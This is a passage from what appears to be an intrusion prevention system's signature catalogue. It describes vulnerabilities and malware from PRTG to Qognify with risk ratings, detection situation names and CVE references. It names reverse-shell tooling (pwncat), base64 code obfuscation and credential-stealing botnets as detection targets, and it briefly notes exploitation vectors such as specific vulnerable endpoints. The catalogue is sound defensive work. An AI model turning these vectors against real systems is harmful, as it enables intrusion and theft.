sgpkg-ips-1836-5242

Platform:

Generic

Software:

PRTG Network Monitor

Type:

Malfunction

Description:

A local file inclusion vulnerability in PRTG Network Monitor versions before 18.2.40.1683 allows an unauthenticated attacker to create new users arbitrarily. This can be used for creating an attacker-controlled administrator user with read-write privileges.

Situation:

HTTP_CSU-PRTG-Network-Monitor-Local-File-Inclusion-CVE-2018-19410

References:

CVE-2018-19410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19410

Psd-Imagemagick-Psd-File-Channel-Buffer-Vulnerability

About this vulnerability:

Imagemagick .psd file parsing vulnerability

Risk:

High

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Buffer Overflow

Description:

ImageMagick Studio LLC's Imagemagick 6.1.0 does not parse .psd images correctly. The number of channels in a .psd file should be limited to 24, and the softwareallocates space for that maximum number of channels. The actual amount of channels in a .psd file is not checked, which results in a buffer overflow when parsing .psd files containing over 24 channels. This allows remote attackers to execute arbitrary code on systems when opening malicious .psd files in Imagemagick.

Situation:

HTTP_Imagemagick-Psd-File-Channel-Buffer-Vulnerability-Download
HTTP_CS-Imagemagick-Psd-File-Channel-Buffer-Vulnerability-Upload
File-Binary_Imagemagick-Psd-File-Channel-Buffer-Vulnerability

References:

CVE-2005-0005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0005

PsExec-Named-Pipe-Detected

About this vulnerability:	A named pipe used by PsExec was detected
Risk:	High
First detected in:	sgpkg-ips-1385-5242
Last changed:	sgpkg-ips-1385-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A named pipe used by PsExec was detected.
Situation:	SMB-TCP_PsExec-Named-Pipe-Detected

PSO-Proxy-v0.91-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow in PSO Proxy v0.91 Web Server

Risk:

High

First detected in:

sgpkg-ips-643-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

PSO Proxy Web Server

Type:

Buffer Overflow

Description:

A buffer overflow in PSO Proxy v0.91 Web Server which allows a remote attacker to execute arbitrary code, or cause a denial of service, via a long HTTP request.

Situation:

HTTP_CS-PSO-Proxy-v0.91-Stack-Buffer-Overflow

References:

CVE-2004-0313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0313

BID-9706
http://www.securityfocus.com/bid/9706

OSVDB-4028
http://www.osvdb.org/4028

PTC-IsoView-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this vulnerability:

A vulnerability in PTC Arbortext IsoView

Risk:

Moderate

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PTC Arbortext IsoView

Type:

Buffer Overflow

Description:

Multiple stack-based buffer overflow vulnerabilities exist in the PTC IsoView ActiveX Control. These vulnerabilities are caused by insufficient validation of the Object identifier arguments to multiple methods of the ActiveX control. A remote attacker can exploit these vulnerabilities by enticing the target user to visit a malicious web page. Successful exploitation would allow the attacker to execute arbitrary code on the target in the security context of the currently logged on user.

Situation:

File-Text_PTC-IsoView-ActiveX-Control-Multiple-Methods-Buffer-Overflow

References:

CVE-2014-9267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9267

BID-71491
http://www.securityfocus.com/bid/71491

PTC-IsoWiew-ActiveX-Control-ViewPort-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in PTC Arbortext IsoView

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PTC Arbortext IsoView

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in the PTC IsoView ActiveX control. The vulnerability is caused by insufficient validation on the ViewPort property value of the ActiveX control. A remote attacker can exploit this vulnerability by enticing the target user to visit a malicious web page. Successful exploitation would allow the attacker to execute arbitrary code on the target in the security context of the currently logged on user.

Situation:

File-Text_PTC-IsoView-ActiveX-Control-ViewPort-Heap-Buffer-Overflow

References:

CVE-2014-9267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9267

Pulse-Connect-Secure-Remote-Code-Execution-CVE-2021-22893

About this vulnerability:

A vulnerability in Pulse Connect Secure

Risk:

High

First detected in:

sgpkg-ips-1343-5242

Last changed:

sgpkg-ips-1343-5242

Platform:

Pulse Secure

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Pulse Secure. Successful exploitation could lead in arbitrary code execution. This situation blocks access to the URIs listed in the Pulse Secure's advisory SA44784.

Situation:

HTTP_CSU-Pulse-Connect-Secure-Remote-Code-Execution-CVE-2021-22893

References:

CVE-2021-22893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22893

Pulse-Connect-Secure-Template-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Pulse Connect Secure detected

Risk:

High

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Pulse Secure

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Pulse Connect Secure detected.

Situation:

HTTP_CRL-Pulse-Connect-Secure-Template-Injection

References:

CVE-2020-8243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243

Pulse-Secure-Cross_Site_Script_Inclusion

About this vulnerability:

A vulnerability in Pulse Connect Secure

Risk:

Moderate

First detected in:

sgpkg-ips-1193-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Pulse Secure

Software:

<os>

Type:

Script Injection

Description:

There exists a cross-site script inclusion vulnerability in Pulse Secure. Successful exploitation could lead in arbitrary JavaScript execution.

Situation:

File-Text_Pulse-Secure-Cross_Site_Script_Inclusion

References:

CVE-2019-11540
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11540

Pulse-Secure-Diag.cgi-Command-Injection

About this vulnerability:

A vulnerability in Pulse Connect Secure

Risk:

Moderate

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Pulse Secure

Software:

<os>

Type:

Input Validation

Description:

There exists a post-auth command injection in Pulse Secure. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Pulse-Secure-Diag.cgi-Command-Injection

References:

CVE-2019-11539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11539

Pulse-Secure-Downloadlicenses.cgi-Command-Injection-CVE-2020-8218

About this vulnerability:

A vulnerability in Pulse Connect Secure

Risk:

High

First detected in:

sgpkg-ips-1443-5242

Last changed:

sgpkg-ips-1443-5242

Platform:

Pulse Secure

Software:

<os>

Type:

Input Validation

Description:

There exists a post-auth command injection in Pulse Secure. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL_Pulse-Secure-Downloadlicenses.cgi-Command-Injection-CVE-2020-8218

References:

CVE-2020-8218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8218

Pulse-Secure-SSL-VPN-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Pulse Secure SSL VPN

Risk:

High

First detected in:

sgpkg-ips-1188-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Pulse Secure

Software:

<os>

Type:

Malfunction

Description:

There exists a cross-site scripting vulnerability in Pulse Secure SSL VPN device. Successful exploitation could lead in arbitrary script execution in the target user's browser.

Situation:

HTTP_CSU-Pulse-Secure-SSL-VPN-Cross-Site-Scripting

References:

CVE-2019-11507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11507

Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading

About this vulnerability:

A vulnerability in Pulse Secure SSL VPN

Risk:

High

First detected in:

sgpkg-ips-1188-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Pulse Secure

Software:

<os>

Type:

Malfunction

Description:

There exists a pre-auth file reading vulnerability in Pulse Secure SSL VPN device. Successful exploitation could lead in system compromise.

Situation:

HTTP_CSU-Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading

References:

CVE-2019-11510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510

Pulse-Secure-SSL-VPN-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Pulse Secure SSL VPN

Risk:

High

First detected in:

sgpkg-ips-1188-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Pulse Secure

Software:

<os>

Type:

Malfunction

Description:

There exists a stack buffer overflow vulnerability in Pulse Secure SSL VPN device. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Pulse-Secure-SSL-VPN-Stack-Buffer-Overflow

References:

CVE-2019-11542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11542

Pulse-Secure-VPN-Arbitrary-Command-Execution

About this vulnerability:

A vulnerability in Pulse Secure VPN

Risk:

High

First detected in:

sgpkg-ips-1203-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix

Software:

Pulse Secure VPN

Type:

Input Validation

Description:

A vulnerability in Pulse Secure VPN which allows remote attackers to execute arbitrary code due to the lack of proper input validation to diag.cgi.

Situation:

HTTP_CSU-Pulse-Secure-VPN-Arbitrary-Command-Execution

References:

CVE-2019-11539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11539

Pulse-Secure-VPN-Arbitrary-File-Disclosure

About this vulnerability:

A vulnerability in Pulse Secure VPN

Risk:

High

First detected in:

sgpkg-ips-1203-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Linux; Unix

Software:

Pulse Secure VPN

Type:

Directory Traversal

Description:

A vulnerability in Pulse Secure VPN which allows remote attackers to gain sensitive information via a directory traversal by specifying /dana/html5acc/guacamole/ in the middle of the path.

References:

CVE-2019-11510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510

Pulse-Secure-VPN-Gzip-RCE

About this vulnerability:

A vulnerability in Pulse Secure VPN.

Risk:

High

First detected in:

sgpkg-ips-1422-5242

Last changed:

sgpkg-ips-1422-5242

Platform:

Generic

Software:

Pulse Secure VPN

Type:

Insecure Configuration

Description:

A vulnerability in Pulse Secure VPN, versions before 9.1R9, which allows remote attackers to overwrite aribitrary files resulting in remote code execution, due to uncontrolled gzip extraction.

Situation:

HTTP_CS-Pulse-Secure-VPN-Gzip-RCE

References:

CVE-2020-8260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260

PurpleFox-EK-Exploit-Redirect-Page

About this vulnerability:	PurpleFox Exploit Kit traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1320-5242
Last changed:	sgpkg-ips-1320-5242
Platform:	Windows
Software:	<os>
Type:	Javascript Injection
Description:	PurpleFox Exploit Kit traffic was detected. An exploit Kit is a platform, which can automatically exploit user's computer when infected website is visited.
Situation:	File-Text_PurpleFox-EK-Exploit-Redirect-Page

Pushbot-Bot

About this vulnerability:	Pushbot Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Pushbot is a Bot that allows remote attackers to take control of the infected machine.
Situation:	Generic_CS-Pushbot-Bot-Traffic

Pushdo-Spambot

About this vulnerability:	Pushdo spambot is a Trojan Horse program used as a template-based spamming engine
Risk:	High
First detected in:	sgpkg-ips-269-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Pushdo spambot
Type:	Backdoor
Description:	Pushdo spambot is a Trojan Horse program used as a template-based spamming engine.
Situation:	HTTP_CSU-Pushdo-Spambot

pwncat-Traffic

About this vulnerability:	pwncat traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1252-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	pwncat is a tool allowing to create bind and reverse shells, self-injecting shells and port-forwardings. It's also fully scriptable with Python.
Situation:	Generic_TCP-pwncat-Traffic File-Text_pwncat-Script

pyLoad-js2py-Python-Execution

About this vulnerability:

A vulnerability in pyLoad.

Risk:

Moderate

First detected in:

sgpkg-ips-1564-5242

Last changed:

sgpkg-ips-1564-5242

Platform:

Unix; Linux

Software:

pyLoad

Type:

Code Injection

Description:

A vulnerability in pyLoad, versions prior to 0.5.0b3.dev31, which allows remote attackers to execute arbitrary code by sending a crafted request to the flash/addcrypted2 endpoint, due to the pyimport functionality exposed through the js2py library.

Situation:

HTTP_CS-pyLoad-js2py-Python-Execution

References:

CVE-2023-0297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0297

pyLoad-RCE-With-js2py-Sandbox-Escape

About this vulnerability:

A vulnerability in Pyload

Risk:

High

First detected in:

sgpkg-ips-1802-5242

Last changed:

sgpkg-ips-1802-5242

Platform:

Linux

Software:

pyLoad

Type:

Misconfiguration

Description:

A vulnerability in pyLoad, versions 0.5.0b3.dev85 and before, which allows remote attackers to execute arbitrary commands though the restricted /flash/addcrypted2 API endpoint, by amnipulation of the HOST header.

Situation:

HTTP_CS-pyLoad-RCE-With-js2py-Sandbox-Escape

References:

CVE-2024-39205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39205

Python-Rot13-File-Encoding

About this vulnerability:	Suspicious file encoding in Python 2
Risk:	Low
First detected in:	sgpkg-ips-636-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Python
Type:	Insecure Configuration
Description:	Many implementations of Python 2 have support for Rot 13 as a file encoder. This may be used to obfuscate code in order to evade content inspection.
Situation:	File-Text_Python-Rot13-File-Encoding

Python-Script-With-Base64-Obfuscation-Pattern

About this vulnerability:	A potentially malicious Python script detected
Risk:	High
First detected in:	sgpkg-ips-1716-5242
Last changed:	sgpkg-ips-1716-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	A Python script contains a suspicious obfuscation pattern that is usually used to bypass inspection. The main content is stored as a base64 encoded blob, which is decoded and executed. It has been seen in, for example, an exploitation of CVE-2024-3400.
Situation:	File-Text_Python-Script-With-Base64-Obfuscation-Pattern

Python-SSL-X.509-Distributionpoint-Extension-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Python Software Foundation Python

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Python

Type:

Malfunction

Description:

There has been reported a denial of service vulnerability in the Python SSL module. This vulnerability can be exploited by sending a crafted packet to a target server. Successful exploitation can lead to denial of service conditions.

Situation:

HTTPS_SS-Python-Ssl-X.509-Distributionpoint-Extension-Null-Pointer-Dereference

References:

CVE-2019-5010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5010

PyTorch-Model-Server-Registration-And-Deserialization-RCE

About this vulnerability:

An attempt to exploit a vulnerability in PyTorch detected

Risk:

High

First detected in:

sgpkg-ips-1729-5242

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

PyTorch

Type:

Insecure Configuration

Description:

A vulnerability in PyTorch model server, versions before 0.8.2, which allows remote attackers to register MAR model files from arbitrary servers, which can lead to arbitrary Java code execution.

Situation:

HTTP_CSU-PyTorch-Model-Server-Registration-And-Deserialization-RCE

References:

CVE-2023-43654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43654

Pyxie-RAT-Infection-Traffic

About this vulnerability:	PyXie RAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1411-5242
Last changed:	sgpkg-ips-1411-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	PyXie RAT infection traffic was detected. TLS decryption might be needed to detect the traffic of PyXie RAT.
Situation:	HTTP_CSH-Pyxie-RAT-Infection-Traffic

Qakbot-Botnet

About this vulnerability:	Qakbot botnet
Risk:	High
First detected in:	sgpkg-ips-654-5211
Last changed:	sgpkg-ips-1475-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Qakbot is a malicious botnet that is primarily used as banking trojan. Qakbot steals login credentials, such as for online banking websites. It infects web browser processes in order to monitor and modify banking website usage, for example, to ask the users to enter personal information such as additional Transaction Authentication Numbers (TANs).
Situation:	HTTP_CRL_Qakbot-Botnet-Traffic HTTP_CRL-Qakbot-Botnet-Traffic-2 HTTP_CRL-Qakbot-Botnet-Traffic-3 Generic_CS-Qakbot-Botnet-Traffic-4

Qbik-WinGate-WWW-Proxy-Server-Stack-Based-Buffer-Overflow

About this vulnerability:

Qbik WinGate WWW Proxy Server 6.1.1.1077 Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Qbik WinGate

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Qbik WinGate WWW Proxy Server 6.1.1.1077 which allows remote attackers to execute arbitrary code, or cause a denial of service condition.

Situation:

HTTP_CS-Qbik-WinGate-WWW-Proxy-Server-Stack-Based-Buffer-Overflow

References:

CVE-2006-2926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2926

BID-18312
http://www.securityfocus.com/bid/18312

OSVDB-26214
http://www.osvdb.org/26214

qdPM-9.1-Authenticated-Arbitrary-PHP-File-Upload

About this vulnerability:

A vulnerability in qdPM.

Risk:

High

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Linux; Windows

Software:

qdPM

Type:

Input Validation

Description:

A vulnerability in qdPM, versions 9.1 and before, which allows remote attackers to execute arbitrary code by uploading arbitrary php files to the users['photop_preview'] delete photo feature.

Situation:

HTTP_CS_qdPM-9.1-Authenticated-Arbitrary-PHP-File-Upload

References:

CVE-2020-7246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7246

Qemu-Monitor-HMP-Migrate-Command-Execution

About this vulnerability:	A vulnerability in QEMU's Monitor Human Monitor Interface (HMP) TCP server.
Risk:	High
First detected in:	sgpkg-ips-1436-5242
Last changed:	sgpkg-ips-1436-5242
Platform:	Linux;Unix
Software:	QEMU
Type:	Input Validation
Description:	A vulnerability in QEMU's Monitor Human Monitor Interface (HMP) TCP server, version 6.2.0, which allows remote attackers to execute arbitrary code via the 'migrate' command.
Situation:	Generic_CS-Qemu-Monitor-HMP-Migrate-Command-Execution

Qemu-VNC-Set_Pixel_Format-Bits_Per_Pixel-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in QEMU QEMU

Risk:

Moderate

First detected in:

sgpkg-ips-618-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

QEMU

Type:

Input Validation

Description:

A null pointer dereference vulnerability has been found in QEMU vnc. The vulnerability is due to insufficient checking of an initialized buffer. A remote attacker could exploit this vulnerability by setting bits_per_pixel to a value that is less than 8. Successful exploitation could lead to a denial of service condition on the guest VM.

Situation:

RFB_CS-Qemu-VNC-Set_Pixel_Format-Bits_Per_Pixel-Null-Pointer-Dereference

References:

CVE-2014-7815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7815

BID-70998
http://www.securityfocus.com/bid/70998

OSVDB-113748
http://www.osvdb.org/113748

Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265

About this vulnerability:

A vulnerability in Qlik Sense

Risk:

High

First detected in:

sgpkg-ips-1660-5242

Last changed:

sgpkg-ips-1660-5242

Platform:

Generic

Software:

Qlik Sense

Type:

Malfunction

Description:

An HTTP request tunneling vulnerability has been reported in Qlik Sense Enterprise. This vulnerability can be leveraged to send arbitrary requests that get executed by the server. When chained together with CVE-2023-41266, this allows for unauthenticated remote code execution.

Situation:

HTTP_CS-Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265

References:

CVE-2023-41265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41265

Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-48365

About this vulnerability:

A vulnerability in Qlik Sense

Risk:

High

First detected in:

sgpkg-ips-1719-5242

Last changed:

sgpkg-ips-1719-5242

Platform:

Generic

Software:

Qlik Sense

Type:

Malfunction

Description:

An HTTP request tunneling vulnerability has been reported in Qlik Sense Enterprise due to an incomplete fix for CVE-2023-41265. This vulnerability can be leveraged to send arbitrary requests that get executed by the server.

Situation:

HTTP_CS-Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265

References:

CVE-2023-48365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48365

Qlik-Sense-Path-Traversal-CVE-2023-41266

About this vulnerability:

A vulnerability in Qlik Sense

Risk:

High

First detected in:

sgpkg-ips-1660-5242

Last changed:

sgpkg-ips-1660-5242

Platform:

Generic

Software:

Qlik Sense

Type:

Input Validation

Description:

A path traversal vulnerability has been reported in Qlik Sense Enterprise. An unauthenticated attacker can use this vulnerability to send HTTP requests to unauthorised endpoints. When chained together with CVE-2023-41265, this allows for unauthenticated remote code execution.

Situation:

HTTP_CSU-Qlik-Sense-Path-Traversal-CVE-2023-41266

References:

CVE-2023-41266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41266

QLogic-SANsurfer-FC-HBA-Manager-Directory-Traversal

About this vulnerability:	A vulnerability in QLogic SANsurfer FC HBA Manager
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	QLogic SANsurfer FC HBA Manager
Type:	Malfunction
Description:	There is a directory traversal vulnerability in QLogic SANsurfer FC HBA Manager.
Situation:	HTTP_CSU-System-File-Disclosure

QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection

About this vulnerability:

A vulnerability in QNAP HBS 3 Hybrid Backup Sync

Risk:

Moderate

First detected in:

sgpkg-ips-1816-5242

Last changed:

sgpkg-ips-1816-5242

Platform:

Generic

Software:

QNAP HBS 3 Hybrid Backup Sync

Type:

Input Validation

Description:

A command injection vulnerability has been reported in HBS 3 Hybrid Backup Sync. The vulnerability is due to improper validation of user data sent to a device running the vulnerable application. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the admin user.

Situation:

HTTP_CRL-QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection
Generic_CS-QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection

References:

CVE-2024-50388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50388

QNAP-Multiple-Products-Hls_Tmp-Directory-Traversal

About this vulnerability:

A vulnerability in QNAP QTS

Risk:

Moderate

First detected in:

sgpkg-ips-1737-5242

Last changed:

sgpkg-ips-1737-5242

Platform:

Generic

Software:

QNAP QTS

Type:

Directory Traversal

Description:

Improper validation of user data sent through the HLS_Tmp parameter causes a directory traversal vulnerability in QNAP QTS. A successful exploitation allows an attacker to read and write files on the target system, potentially causing a denial of service condition.

Situation:

HTTP_CRL-QNAP-Multiple-Products-Hls_Tmp-Directory-Traversal

References:

CVE-2023-51365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51365

QNAP-Multiple-Products-Log-Upload-Command-Injection

About this vulnerability:

A vulnerability in QNAP QTS

Risk:

Moderate

First detected in:

sgpkg-ips-1776-5242

Last changed:

sgpkg-ips-1776-5242

Platform:

Generic

Software:

QNAP QTS

Type:

Input Validation

Description:

Improper validation of user data sent to the blobRequest.cgi endpoint causes a command injection vulnerability in QNAP products. A successful exploitation allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-QNAP-Multiple-Products-Log-Upload-Command-Injection

References:

CVE-2023-51364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51364

QNAP-Multiple-Products-Privwizard-Username-Command-Injection

About this vulnerability:

A vulnerability in QNAP myQNAPcloud

Risk:

Moderate

First detected in:

sgpkg-ips-1770-5242

Last changed:

sgpkg-ips-1770-5242

Platform:

Generic

Software:

QNAP QTS

Type:

Input Validation

Description:

Improper validation of user data sent through the username parameter sent in to the privWizard.cgi endpoint causes a command injection vulnerability in multiple QNAP products. A successful exploitation allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-QNAP-Multiple-Products-Privwizard-Username-Command-Injection

References:

CVE-2024-32766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32766

QNAP-Photo-Station-Externally-Controlled-Reference-To-A-Resource-CVE-2022-27593

About this vulnerability:

A vulnerability in QNAP Photo Station

Risk:

High

First detected in:

sgpkg-ips-1636-5242

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

QNAP Photo Station

Type:

Input Validation

Description:

An externally controlled reference to a resource vulnerability has been reported in QNAP NAS Photo Station. Exploiting this vulnerability does not require authentication and allows remote attackers to modify system files.

Situation:

HTTP_CRL-QNAP-Photo-Station-Externally-Controlled-Reference-To-A-Resource-CVE-2022-27593

References:

CVE-2022-27593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27593

QNAP-Photo-Station-Path-Traversal-Vulnerability-CVE-2019-7194

About this vulnerability:

An attempt to exploit a vulnerability in QNAP Photo Station detected

Risk:

High

First detected in:

sgpkg-ips-1591-5242

Last changed:

sgpkg-ips-1591-5242

Platform:

Generic

Software:

QNAP Photo Station

Type:

Input Validation

Description:

This is a path traversal vulnerability in QNAP Photo Station, which allows remote attackers to access or modify system files.

Situation:

HTTP_CRL-QNAP-Photo-Station-Path-Traversal-Vulnerability-CVE-2019-7194

References:

CVE-2019-7194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7194

QNAP-Q-Center-Virtual-Appliance-Change_Passwd-Command-Execution

About this vulnerability:

A vulnerability in QNAP Q-Center Virtual Appliance

Risk:

High

First detected in:

sgpkg-ips-1134-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

QNAP Q-Center

Type:

Input Validation

Description:

A vulnerability in QNAP Q-Center Virtual Appliance, versions prior to 1.7.1083, which allows unauthenticated remote attackers to execute arbitrary commands through the change_passwd API method.

Situation:

HTTP_CRL-QNAP-Q-Center-Virtual-Appliance-Change_Passwd-Command-Execution

References:

CVE-2018-0707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0707

QNAP-QTS-QuTS-hero-Command-Injection-CVE-2023-47218

About this vulnerability:

A vulnerability in QNAP

Risk:

High

First detected in:

sgpkg-ips-1693-5242

Last changed:

sgpkg-ips-1693-5242

Platform:

Generic

Software:

QNAP QTS

Type:

Input Validation

Description:

An unauthenticated command injection vulnerability has been reported in QNAP NAS operating systems QTS and QuTS hero. Successfully exploiting this vulnerability could result in remote code execution.

Situation:

HTTP_CS-QNAP-QTS-QuTS-hero-Command-Injection-CVE-2023-47218

References:

CVE-2023-47218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47218

QNAP-Remote-Code-Execution-CVE-2024-27130

About this vulnerability:

A vulnerability in QNAP NAS

Risk:

High

First detected in:

sgpkg-ips-1730-5242

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

QNAP QTS

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in the file sharing functionality of the QNAP NAS devices. A remote, unauthenticated attacker can leverage this vulnerability for remote code execution.

Situation:

HTTP_CRL-QNAP-Remote-Code-Execution-CVE-2024-27130

References:

CVE-2024-27130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27130

QNAP-Transcode-Server-Command-Execution

About this vulnerability:	A QNAP Transcode Server Command Execution vulnerability
Risk:	High
First detected in:	sgpkg-ips-1023-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	QNAP Transcode Server
Type:	Input Validation
Description:	A vulnerability in QNAP Transcode Server, firmware version 4.3.3.0262, which allows remote attackers to execute arbitrary code due to the lack of proper unput validation.
Situation:	Generic_CS-QNAP-Transcode-Server-Command-Execution

QNAP-Viostor-NVR-Command-Injection-CVE-2023-47565

About this vulnerability:

A vulnerability in QNAP VioStor NVR

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

QNAP VioStor NVR

Type:

Input Validation

Description:

An OS command injection vulnerability has been reported for the QNAP VioStor network video recorders running QVR firmware versions 4.x.

Situation:

HTTP_CRL-QNAP-Viostor-NVR-Command-Injection-CVE-2023-47565

References:

CVE-2023-47565
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47565

QNX-Phrelay-DoS

About this vulnerability:	A vulnerability in QNX phrelay
Risk:	Moderate
First detected in:	sgpkg-ips-612-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	QNX
Software:	<os>
Type:	Input Validation
Description:	A vulnerability in QNX phrelay
Situation:	Generic_CS-QNX-Phrelay-DoS

QNX-QCONN-Denial-Of-Service

About this vulnerability:	A vulnerability in QNX Qconn allowing denial of service and remote code execution.
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	QNX
Software:	<os>
Type:	Malfunction
Description:	A vulnerability exists in QNX Qconn where it is possible for an attacker can execute arbitrary commands.
Situation:	Generic_CS-QNX-QCONN-Denial-Of-Service-Denial-Of-Service

Qognify-Ocularis-Eventcoordinator-Insecure-Deserialization

About this vulnerability:

A vulnerability in Qognify Ocularis

Risk:

High

First detected in:

sgpkg-ips-1316-5242

Last changed:

sgpkg-ips-1316-5242

Platform:

Generic

Software:

Qognify Ocularis

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Qognify Ocularis. The vulnerability is due to insufficient validation of request to EventCoordinator endpoint. A remote, unauthenticated user can exploit this vulnerability by sending malicious request to the target server. Successful exploitation can result in result in arbitrary code execution under the security context of SYSTEM.

Situation:

Generic_CS-Qognify-Ocularis-Eventcoordinator-Insecure-Deserialization

References:

CVE-2020-27868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27868

